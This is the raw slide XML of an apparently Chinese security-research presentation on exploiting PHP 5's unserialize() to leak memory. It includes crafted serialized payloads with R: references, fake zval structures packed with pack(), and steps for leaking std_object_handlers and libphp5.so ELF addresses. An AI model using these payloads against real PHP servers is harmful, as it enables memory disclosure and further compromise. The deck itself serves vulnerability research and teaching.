              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>$obj </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O:8:"stdClass":3:{s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;s:10:"AAAAAAAAAA";i:3;i:4;i:4;i:5;}s:3:"aaa";i:1;s:3:"ccc";R:6;}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>$obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>($obj);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>($i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 0; $i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 5; $i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    $v[$i]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>$fakezval.$i;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> $obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>ccc;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>?&gt;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1402-707B-47A3-90A8-4F7C65F8C2DA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537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83894" y="1514901"/>
            <a:ext cx="747897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&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>$addr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=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rgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x08048000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>$count </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>$obj </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O:8:"stdClass":4:{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>$obj </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;s:10:"AAAAAAAAAA";i:3;i:4;i:4;i:5;}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>$obj </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s:3:"aaa";i:1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>$obj </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s:3:"ccc";R:7;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>$obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> .= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s:3:"ddd";S:17:"'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>$addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>$count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'\00\00\00\00\06\00\0B\BC\CC";}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>($obj));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>?&gt;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0A51-89A2-489F-8A94-4F9F90A33B67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95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 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2012~now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>知道创宇</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全研究</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Binary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全研究（嵌入式、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Linux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QQ:448354223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C90B-AA5C-4CC6-9B53-D528983B62BE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623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5.2 Leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>std_object_handlers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>addrs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5.2.1 Leak a object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.2.1 Object value structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5.2.3 Object ZVAL structure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FAEC2-ABE2-4336-AF00-17DABCB39DF3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578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5.2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>object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脚本演示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0361-2095-44DA-85DD-4781A79B79D7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032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5.2.1 Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>structure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38200" y="2828836"/>
            <a:ext cx="105155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typedef struct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>_zend_object_value {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>	zend_object_handle handle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对象实体的存储索引</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> zend_object_handlers *handlers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>标准对象处理函数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>} zend_object_value;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2D63-F867-461F-B2FD-08533F1D0D11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66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5.2.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ZVAL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>structure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48000" y="2413338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400" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>php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$fake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>_object_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>zval </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IIII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>',     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//unsigned int</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXXXXXXX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>handle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B7XXXXXX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>handlers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wo need this</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//refcount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//data type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>);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923C-A624-42D3-B510-752802C20C71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8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5.3 Leak libphp5.so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ELF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>info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Std_object_handlers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> in libphp5.so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>std_object_handlers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>里找一个内存地址最低的地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xB7XXXXXX &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xfff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xB7XXX000 </a:t>
            </a:r>
            <a:r>
